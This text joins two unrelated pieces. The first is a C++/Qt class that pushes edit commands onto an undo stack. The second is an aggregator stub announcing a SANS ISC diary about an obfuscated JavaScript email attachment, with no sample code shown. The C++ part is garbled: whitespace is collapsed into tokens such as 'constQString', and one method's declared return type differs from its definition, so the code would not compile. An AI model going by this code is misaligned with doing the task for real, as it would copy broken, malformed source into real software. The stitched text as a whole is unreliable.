class UndoableThingEditingBehavior :public ThingEditingBehavior
{Q_OBJECTpublic:explicit UndoableThingEditingBehavior( ThingEditor *a_editor,QObject*a_parent =nullptr);protected:
    EditCellCommand* editCurrentSync(constQString&a_value,bool a_exec =true) Q_DECL_OVERRIDE;
    EditCurrentCommand* pasteCurrentFromClipboardSync(bool a_exec =true) Q_DECL_OVERRIDE;private:
    QScopedPointer<QUndoStack> m_undoStack;};

EditCellCommand* UndoableThingEditingBehavior::editCurrentSync(constQString&a_value,bool a_exec ){Q_UNUSED(a_exec)
    EditCellCommand *undoable = ThingEditingBehavior::editCurrentSync(  a_value,false);
    m_undoStack->push( undoable );return undoable;}

EditCellCommand* UndoableThingEditingBehavior::pasteCurrentFromClipboardSync(bool a_exec ){Q_UNUSED(a_exec)
    EditCellCommand *undoable = ThingEditingBehavior::pasteCurrentFromClipboardSync(false);
    m_undoStack->push( undoable );return undoable;}

Xavier Mertens: [SANS ISC] Nicely Obfuscated JavaScript Sample

$
0
0

I published the following diary on isc.sans.org: “Nicely Obfuscated JavaScript Sample“.

One of our readers sent us an interesting sample that was captured by his anti-spam. The suspicious email had an HTML file attached to it. By having a look at the file manually, it is heavily obfuscated and the payload is encoded in a unique variable… [Read more]

[The post [SANS ISC] Nicely Obfuscated JavaScript Sample has been first published on /dev/random]

Viewing all 4959 articles
Browse latest View live